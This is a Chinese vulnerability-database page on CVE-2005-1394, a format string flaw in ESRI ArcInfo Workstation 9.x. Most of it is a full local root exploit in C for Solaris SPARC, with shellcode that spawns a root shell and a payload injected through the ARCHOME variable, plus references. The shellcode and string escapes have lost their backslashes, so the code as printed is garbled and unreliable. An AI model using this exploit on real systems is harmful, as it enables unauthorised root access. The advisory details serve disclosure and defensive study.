ESRI ArcInfo Workstation多个本地缓冲区溢出及格式化字符串漏洞

ESRI ArcInfo Workstation多个本地缓冲区溢出及格式化字符串漏洞

漏洞ID 1108733 漏洞类型 格式化字符串
发布时间 2005-04-30 更新时间 2005-10-20
CVE编号 CVE-2005-1394
CNNVD-ID CNNVD-200505-877
漏洞平台 Solaris CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/972
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-877
|漏洞详情
ESRI ArcInfo Workstation 9.0 的 ArcGIS 存在格式化字符串漏洞，本地用户可以通过在传递给 (1) wservice 或 (2) lockmgr 的 ARCHOME 环境变量中的格式化字符串限定符来获取权限。
|漏洞EXP
/** ESRI 9.x Arcgis local root format string exploit
**
** Copyright Kevin Finisterre and John H.
** Bug found by Kevin Finisterre <[email protected]>
** Exploit by John H. <[email protected]>
**
** We overwrite the thr_jmp_table
** Tested on solaris 10
**/

#include <dlfcn.h>
#include <fcntl.h>
#include <link.h>
#include <procfs.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/systeminfo.h>

#define VULPROG "/export/home/arcgis/arcexe9x/bin/wservice"
#define NOP                     "xa2x1cx40x11"
int             iType;

/* Per-platform constants selected with -t <index>. The same declaration also
 * defines v, an unused instance of this anonymous struct type that main() and
 * usage() only use as a sizeof operand to compute the number of entries. */
struct
{
       unsigned long retloc;   /* address main() embeds in the payload (also retloc+2) */
       unsigned long retaddr;  /* value main() splits into 16-bit halves (hi/lo) */
       char          *type;    /* label printed by usage() next to the entry's index */
}targets[] =
{

       /* bash-2.05b$ nm /usr/lib/ld.so.1 | grep thr_jmp_table
          0003a234 d thr_jmp_table
        */
       {0xff3ea234,0xffbffba8,"SunOS 5.10sun 4u sparc SUNW"},
       /* Debug entry: both fields are the ASCII bytes "ABCD", recognizable in a crash dump. */
       {0x41424344,0x41424344,"DEBUG"},
        },v;

//shellcode taken from netric
/* Byte string main() places in env[0] of the exec'd process. The 120 NOP
 * tokens precede the instruction sequence; the per-instruction comments are
 * the author's own annotations. */
char shellcode[] =
"55"

NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP
NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP NOP

       // setreuid(0,0);

       "x90x1dx80x16"      // xor  %l6, %l6, %o0
       "x92x1dx80x16"      // xor  %l6, %l6, %o1
       "x82x10x20xca"      // mov  0xca, %g1
       "x91xd0x20x08"      // ta  8

       "x90x1dx80x16"      // xor          %l6, %l6, %o0
       "x92x1dx80x16"      // xor          %l6, %l6, %o1
       "x82x18x40x01"      // xor          %g1, %g1, %g1
       "x82x10x20xcb"      // mov          0x2e, %g1
       "x91xd0x20x08"      // ta           8                       [setregid(0,0)]

       "x21x0bxd9x19"      // sethi        %hi(0x2f646400), %l0
       "xa0x14x21x76"      // or           %l0, 0x176, %l0
       "x23x0bxddx1d"      // sethi        %hi(0x2f747400), %l1
       "xa2x14x60x79"      // or           %l1, 0x79, %l1
       "xe0x3bxbfxf8"      // std          %l0, [ %sp - 0x8 ]
       "x90x23xa0x08"      // sub          %sp, 8, %o0
       "x92x1bx80x0e"      // xor          %sp, %sp, %o1
       "x82x10x20x05"      // mov          0x05, %g1
       "x91xd0x20x08"      // ta           8                       [open("/dev/tty",RD_ONLY)]

       "x90x10x20x02"      // mov          0x02, %o0
       "x82x10x20x29"      // mov          0x29, %g1
       "x91xd0x20x08"      // ta           8                       [dup(2)]

       "x21x0bxd8x9a"      // sethi        %hi(0x2f626800), %l0
       "xa0x14x21x6e"      // or           %l0, 0x16e, %l0
       "x23x0bxcbxdc"      // sethi        %hi(0x2f2f7000), %l1
       "xa2x14x63x68"      // or           %l1, 0x368, %l1
       "xe0x3bxbfxf0"      // std          %l0, [ %sp - 0x10 ]
       "xc0x23xbfxf8"      // clr          [ %sp - 0x8 ]
       "x90x23xa0x10"      // sub          %sp, 0x10, %o0
       "xc0x23xbfxec"      // clr          [ %sp - 0x14 ]
       "xd0x23xbfxe8"      // st           %o0, [ %sp - 0x18 ]
       "x92x23xa0x18"      // sub          %sp, 0x18, %o1
       "x94x22x80x0a"      // sub          %o2, %o2, %o2
       "x82x18x40x01"      // xor          %g1, %g1, %g1
       "x82x10x20x3b"      // mov          0x3b, %g1
       "x91xd0x20x08"      // ta           8                       [execve("/bin/sh","/bin/sh",NULL)]

       "x82x10x20x01"      // mov          0x01, %g1
       "x91xd0x20x08"      // ta           8                       [exit(?)]

       "x10xbfxffxdf"      // b            shellcode
       "x90x1dx80x16";     // or           %o1, %o1, %o1

/* Big endian */
/* sparc */
char *putLong (char* ptr, long value)
{
   /* Append the low 32 bits of value to ptr, most-significant byte first
    * (big-endian, as the comment above says), and return the pointer
    * advanced past the four bytes written. Only the low byte of each
    * shifted value is stored, so any bits above bit 31 are ignored. */
   for (int shift = 24; shift >= 0; shift -= 8) {
      *ptr++ = (char) ((value >> shift) & 0xff);
   }

   return ptr;
}

/* main */
/* Entry point. Parses -t <index>, builds the string "ARCHOME=<payload>" from
 * targets[iType] and execs VULPROG with that environment. Returns -1 when
 * fewer than three arguments are given, 0 on the other usage paths and after
 * a failed execve; execve itself does not return on success.
 * NOTE(review): the usage-error exit codes are inconsistent (return -1,
 * return 0, exit(1)). */
int main(int argc, char **argv)
{

   unsigned long retaddr;
   unsigned long retloc;
   int offset = 23;       /* author's tuning constant, used only in shift0 */
   int dump_fmt=129;      /* number of "%.8x" conversions emitted below */
   int al = 1;            /* number of leading filler bytes in buf */
   int i=0;
   int x=0;               /* NOTE(review): x, padding and padding1 are never used */
   int c;
   unsigned long hi,lo;
   static unsigned long shift0,shift1;
   char    buf[9000];     /* payload, zero-filled before use */
   char    *args[24];
   char    *env[6];
   char            *ptr;
   char            padding[64];
   char            padding1[64];
   char            buf2[9000];   /* "ARCHOME=" + buf, zero-filled before use */

   /* NOTE(review): usage() is defined after main with no prototype in view,
    * so these calls rely on an implicit declaration (removed in C99). */
   if (argc < 3) {
               usage (argv[0]);
               return -1;
       }

     /* "h:" declares -h as taking an argument, so a bare -h is reported by
      * getopt as an error and still reaches usage() through default. */
     while((c = getopt(argc, argv, "h:t:")) != EOF) {
               switch(c) {
                       case 'h':
                               usage (argv[0]);
                               return 0;
                       case 't':
                               iType = atoi (optarg);
                               break;
                       default:
                               usage (argv[0]);
                               return 0;
               }
       }

/* Unreachable: argc < 3 already returned above. */
if (argc < 2) { usage(argv[0]); exit(1); }

   /* Bounds-check the -t index; sizeof(v) is the size of one entry. */
   if( (iType<0) || (iType>=sizeof(targets)/sizeof(v)) )
   {
       usage(argv[0]);
       printf("[-] Invalid type.n");
       return 0;
}

   /* Environment handed to the exec'd process: env[0] is shellcode[],
    * env[1] becomes the ARCHOME variable assembled below. */
   env[0] = shellcode;
   env[1] = buf2;
   env[2] = NULL;

   /* VULPROG is exec'd with no arguments. */
   args[0] = VULPROG;
   args[1] = NULL;

  retloc =  targets[iType].retloc;
  retaddr = targets[iType].retaddr;

   /* Split retaddr into its 16-bit halves; shift0/shift1 become the
    * precision values of the two conversions appended at the end of buf. */
   hi = (retaddr >> 16) & 0xffff;
   lo = (retaddr >> 0) & 0xffff;

   shift0 = hi - offset - (dump_fmt * 8 + 16 + al);
   shift1 = (0x10000 +  lo) - hi;

   /* Both buffers start zeroed so the strcat/sprintf calls below append to
    * an empty string at ptr. */
   memset(buf,0x00,sizeof(buf));
   memset(buf2,0x00,sizeof(buf2));
   ptr = buf;

    /* al filler bytes ('A'). */
    for (i = 0; i < al; i++) {
               *ptr++ = 0x41;
       }

   /* Four big-endian words: marker, retloc, marker, retloc+2. */
   ptr = putLong (ptr, 0x41414141);
   ptr = putLong (ptr, retloc);
   ptr = putLong (ptr, 0x42424242);
   ptr = putLong (ptr, retloc+2);

   /* dump_fmt copies of "%.8x" (4 bytes each, no terminator copied). */
   for (i = 0 ; i < dump_fmt; i ++) {
               memcpy(ptr, "%.8x", 4);
               ptr = ptr + 4;
    }

   strcat(ptr,"%.");
 sprintf(ptr+strlen(ptr),"%u",shift0);
  strcat(ptr,"lx%hn");

  strcat(ptr,"%.");
   sprintf(ptr+strlen(ptr),"%u",shift1);
   strcat(ptr,"lx%hn");

   /* ARCHOME is the environment variable the advisory (CVE-2005-1394) names
    * as the tainted format-string input to wservice/lockmgr. On the
    * vulnerable side the fix is to pass such a value only as a "%s"
    * argument, never as the format string itself. */
   strcat(buf2,"ARCHOME=");
   memcpy(buf2+strlen(buf2),buf,strlen(buf));

   /* execve returns only on failure. */
   execve (args[0], args, env);
   perror ("execve");
 return 0;
}

int usage(char *p)
{
   /* Print the command-line synopsis for program name p, then one line per
    * entry of targets[] giving its index and label. Always returns 0. */
   size_t count = sizeof(targets) / sizeof(v);

   printf( "Arcgis local root format string exploitrn");
   printf( "Usage: %s <-t target>n",p);

   for (size_t k = 0; k < count; k++)
   {
       printf("%dt%sn", (int) k, targets[k].type);
   }

   return 0;
}

// milw0rm.com [2005-04-30]
|参考资料

来源:MISC
链接:http://www.digitalmunition.com/DMA%5B2005-0425a%5D.txt
来源:SECTRACK
名称:1013852
链接:http://securitytracker.com/id?1013852
来源:SECUNIA
名称:15196
链接:http://secunia.com/advisories/15196
来源:support.esri.com
链接:http://support.esri.com/index.cfm?fa=downloads.patchesServicePacks.viewPatch&PID=14&MetaID=1015
来源:FULLDISC
名称:20050430 DMA[2005-0425a] - 'ESRI ArcGIS 9.x multiple local vulnerabilities'
链接:http://marc.theaimsgroup.com/?l=full-disclosure&m=111489411524630&w=2
